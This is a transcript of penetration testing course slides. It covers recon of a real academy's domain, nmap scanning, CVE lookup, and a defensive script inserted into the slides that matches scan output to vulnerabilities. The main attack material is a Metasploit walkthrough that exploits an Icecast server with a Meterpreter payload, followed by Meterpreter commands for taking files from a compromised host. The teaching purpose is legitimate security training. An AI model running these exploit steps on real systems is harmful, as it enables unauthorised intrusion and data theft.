
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.



Presentation transcript:

1 Part 2 Penetration Testing

2 Review
2-minute exercise: RECON ONLY
Find 3x IP addresses at the U.S. Merchant Marine Academy
Google: “U.S. Merchant Marine Academy” to find the URL
site:usmma.edu
site:usmma.edu -www.usmma.edu
nslookup blackboard.usmma.edu
nslookup ...

3 Review
1-minute exercise: Use nmap to find all of the IP addresses in your group’s network ( /24)
nmap -sn *

4 Review
1-minute exercise: Use nmap to find all of the open ports on
Looking at the open ports, what type of server is this?
nmap
(DNS server)

5 Review
2-minute exercise: Use nmap to find the version of the DNS server running on , port 53.
ssh in and run this command to verify: /usr/sbin/named -ver
sudo nmap -sV
ISC BIND P1

6 Phase 3 - Penetration
The goal of this step is to obtain a shell or run code on a remote machine.
90% research, 10% attack
Method:
1. Pick a host to exploit
2. Pick a running service on that host to exploit
3. Find out the version of the service
4. Find an exploit that works against that version
5. Run the exploit
6. Repeat as required

7 Metasploit
Pentester tool / hacker tool
Provides information about known security vulnerabilities
Three types of tools:
  exploits: code to overflow buffers / break into servers
  payloads: code to provide access to the OS, often a shell
  auxiliary: misc. functions, usually to retrieve information such as version numbers

8 CVE
Common Vulnerabilities and Exposures (CVE)
Reference system for known vulnerabilities
Managed by MITRE Corporation
Funded by DHS’s National Cyber Security Division
Info is mirrored on multiple other sites, e.g.:

9 CVE
When in doubt, ask Google: ...
Google: cve isc bind P1
CVE  CVE  CVE  CVE
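Slides 6 and 9 describe the same lookup from two ends: take the version string nmap reports for a service, then find the CVE entries that apply to it. The script below is an added example, not part of the slides, that automates that mapping the way a defender auditing their own network would: it parses `nmap -sV` output and reports every service whose version falls inside an affected range from an advisory table, so the hosts that need patching surface before anyone needs an exploit. The nmap output is constructed sample text, and the advisory table (version ranges and CVE ids of the form CVE-0000-NNNN) is a placeholder standing in for the CVE/NVD data the slides point to.

```python
import re

# Constructed sample of `nmap -sV` output; not real scan data.
SAMPLE_NMAP = """\
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.3 (protocol 2.0)
53/tcp open  domain  ISC BIND 9.7.0-P1
80/tcp open  http    Apache httpd 2.2.15 ((CentOS))
"""

# Placeholder advisory table: product -> [(first affected, last affected, CVE id)].
# The ranges and CVE ids are placeholders, not real identifiers; in practice
# this table is built from the CVE/NVD feeds.
ADVISORIES = {
    "ISC BIND": [("9.7.0", "9.7.2", "CVE-0000-0001")],
    "OpenSSH": [("0", "5.4", "CVE-0000-0002")],
}

# One nmap port line: "<port>/<proto> open <service> <VERSION column>".
PORT_LINE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\s+\S+\s+(.*)$")
# Product name is everything before the first numeric token in the VERSION column.
PRODUCT_VERSION = re.compile(r"^(.+?)\s+(\d[\w.\-]*)")
# Well-formed CVE id as found in search results or advisories.
CVE_ID = re.compile(r"\bCVE-\d{4}-\d{4,}\b")


def version_key(version):
    """Turn '9.7.0-P1' into (9, 7, 0, 1) so versions compare numerically.
    Good enough for dotted versions with a patch suffix; not a full semver parser."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def parse_services(nmap_text):
    """Yield (port, product, version) for each open port with a fingerprinted version."""
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        pv = PRODUCT_VERSION.match(m.group(2))
        if pv:
            yield m.group(1), pv.group(1), pv.group(2)


def find_exposed(nmap_text, advisories):
    """Return (port, product, version, cve) for every service whose version
    falls inside an affected range in the advisory table."""
    hits = []
    for port, product, version in parse_services(nmap_text):
        key = version_key(version)
        for low, high, cve in advisories.get(product, []):
            if version_key(low) <= key <= version_key(high):
                hits.append((port, product, version, cve))
    return hits


def extract_cve_ids(text):
    """Pull well-formed CVE ids out of free text, deduplicated and sorted."""
    return sorted(set(CVE_ID.findall(text)))


if __name__ == "__main__":
    for hit in find_exposed(SAMPLE_NMAP, ADVISORIES):
        print("%s %s %s -> investigate %s" % hit)
```

Run against a real `nmap -sV` capture of your own hosts, the interesting part is the gaps: services with no version string (nothing to match) and products missing from the advisory table (nothing to match against) are exactly where an attacker following slide 6 gets to do the "90% research" on your behalf.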

10 Metasploit – find version of server
$ msfconsole
> search ssh
> use auxiliary/scanner/ssh/ssh_version
> show options
> set RHOSTS
> exploit
Similar to: nmap -sV -p22

11 Exploit walkthrough
Target machine is
nmap -O
nmap -sV
Google: cve icecast
$ msfconsole
> search icecast
> use exploit/windows/http/icecast_header
> show options
> set RHOST
> set PAYLOAD windows/meterpreter/bind_tcp
> exploit

12 Meterpreter basics
Meterpreter is a special shell injected as our payload
Useful commands:
getwd                # show the current working directory
sysinfo              # print system info (name, OS, etc.)
ipconfig             # network info
ps                   # list all processes
upload <src> <dest>  # copy a file to the target
download <src> <dest>  # copy a file from the target
shell                # obtain a Windows shell (Win hosts only)

